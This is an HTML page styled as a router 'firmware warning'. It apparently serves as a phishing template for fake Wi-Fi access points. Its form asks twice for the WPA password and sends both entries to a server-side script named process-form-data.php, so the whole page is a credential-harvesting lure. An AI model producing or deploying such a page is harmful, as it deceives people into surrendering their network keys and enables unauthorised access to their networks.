<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="generator" content="CoffeeCup HTML Editor (www.coffeecup.com)">
    <meta name="dcterms.created" content="Sun, 20 Oct 2013 05:27:19 GMT">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <title>firmware warning 8746</title>
    
    <style type="text/css">
    <!--
    body {
      color:#000000;
      background-color:#FFFFFF;
      background-image:url('routerblank15.JPG');
      background-repeat:no-repeat;
    }
    a  { color:#0000FF; }
    a:visited { color:#800080; }
    a:hover { color:#008000; }
    a:active { color:#FF0000; }
    -->
    </style>
    <!--[if IE]>
    <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
  </head>
  <body>
  <center>
<form action="process-form-data.php" method="post">
<fieldset style="border: none;">
<table width="320">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
	<tr>
		<td colspan="1" align=left>WPA:</td>
		<td colspan="3" width="100%"><input style="width:100%;" name="login" type="password"/></td>
	</tr>
    <tr>
		<td colspan="1" align=left>WPA:</td>
		<td colspan="3" width="100%"><input style="width:100%;" type="password" name="password" /></td>
	</tr>
	<tr>
	</tr>
	<tr></tr>
	<td align=right><input type="submit" value="login" name="facebook" /></td>
  <tr></tr>
</table>
  </body>
</html>